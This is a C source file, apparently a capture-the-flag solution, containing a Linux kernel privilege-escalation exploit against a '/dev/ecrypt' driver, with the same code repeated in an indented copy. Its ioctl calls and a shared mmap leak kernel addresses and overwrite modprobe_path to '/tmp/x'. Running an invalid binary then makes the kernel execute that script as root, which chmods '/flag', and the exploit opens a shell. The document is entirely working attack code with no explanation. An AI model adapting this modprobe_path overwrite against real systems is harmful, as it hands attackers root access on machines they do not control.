r4j0x00/exploit.c

## exploit.c
#include <stdio.h>
#include <fcntl.h>
#include <string.h>
#include <stdint.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

#define SETKEY   0x3003003
#define SETIV    0x4004004
#define RESETKEY 0x5005005
#define RESETIV  0x6006006

char buf[0x1000] = {0, };

void modprobe_hax()
{
    system("echo '#!/bin/sh' > /tmp/x; echo 'chmod 777 /flag' >> /tmp/x");
    system("chmod +x /tmp/x");
    int ff = open("/tmp/asd", O_WRONLY|O_CREAT);
    write(ff, "\xff\xff\xff\xff", 4);
    close(ff);
    system("chmod 777 /tmp/asd; /tmp/asd");
    system("sh");
}


int main(void) {
    int result;
    int fd = open("/dev/ecrypt", O_RDWR);
    printf("[*] fd: %d\n", fd);

    result = ioctl(fd, SETKEY, buf);
    printf("[*] SETKEY: %d\n", result);
    result = ioctl(fd, SETIV, buf);
    printf("[*] SETIV: %d\n", result);


    uint64_t* ptr = mmap(0xcafebabe000, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x1000);
    printf("[*] mmap!! -> %p\n", ptr);
    for (int i = 0; i < 512; i++) {
        if (ptr[i] != 0) {
            printf("[*] ptr[%d]: %lx\n", i, ptr[i]);
        }
    }

    char asd[] = "modprobe";
    result = ioctl(fd, SETKEY, asd);
    printf("[*] SETKEY: %d\n", result);

    uint64_t modprobe = (ptr[1] & ~0xfffffff) + 0x3502540-0x10;
    uint64_t _modprobe = modprobe - 0x3502540 + 0x264e608 + 0x10;
    uint64_t modprobe_ctl[] = {0, 0, ptr[0], _modprobe};

    ptr[0] = modprobe;
    result = ioctl(fd, SETKEY, (void *)modprobe_ctl);
    int mp = open("/proc/sys/kernel/modprobe", 0);

    uint64_t modprobe_path;
    read(mp, &modprobe_path, 8);
    ptr[0] = modprobe_path;

    printf("modprobe: %#lx\n", modprobe_path);
    strcpy(asd, "/tmp/x");
    ioctl(fd, SETKEY, asd);

    modprobe_hax();
}
	#include <stdio.h>
	#include <fcntl.h>
	#include <string.h>
	#include <stdint.h>
	#include <sys/ioctl.h>
	#include <sys/mman.h>

	#define SETKEY 0x3003003
	#define SETIV 0x4004004
	#define RESETKEY 0x5005005
	#define RESETIV 0x6006006

	char buf[0x1000] = {0, };

	void modprobe_hax()
	{
	system("echo '#!/bin/sh' > /tmp/x; echo 'chmod 777 /flag' >> /tmp/x");
	system("chmod +x /tmp/x");
	int ff = open("/tmp/asd", O_WRONLY\|O_CREAT);
	write(ff, "\xff\xff\xff\xff", 4);
	close(ff);
	system("chmod 777 /tmp/asd; /tmp/asd");
	system("sh");
	}


	int main(void) {
	int result;
	int fd = open("/dev/ecrypt", O_RDWR);
	printf("[*] fd: %d\n", fd);

	result = ioctl(fd, SETKEY, buf);
	printf("[*] SETKEY: %d\n", result);
	result = ioctl(fd, SETIV, buf);
	printf("[*] SETIV: %d\n", result);


	uint64_t* ptr = mmap(0xcafebabe000, 0x1000, PROT_READ \| PROT_WRITE, MAP_SHARED, fd, 0x1000);
	printf("[*] mmap!! -> %p\n", ptr);
	for (int i = 0; i < 512; i++) {
	if (ptr[i] != 0) {
	printf("[*] ptr[%d]: %lx\n", i, ptr[i]);
	}
	}

	char asd[] = "modprobe";
	result = ioctl(fd, SETKEY, asd);
	printf("[*] SETKEY: %d\n", result);

	uint64_t modprobe = (ptr[1] & ~0xfffffff) + 0x3502540-0x10;
	uint64_t _modprobe = modprobe - 0x3502540 + 0x264e608 + 0x10;
	uint64_t modprobe_ctl[] = {0, 0, ptr[0], _modprobe};

	ptr[0] = modprobe;
	result = ioctl(fd, SETKEY, (void *)modprobe_ctl);
	int mp = open("/proc/sys/kernel/modprobe", 0);

	uint64_t modprobe_path;
	read(mp, &modprobe_path, 8);
	ptr[0] = modprobe_path;

	printf("modprobe: %#lx\n", modprobe_path);
	strcpy(asd, "/tmp/x");
	ioctl(fd, SETKEY, asd);

	modprobe_hax();
	}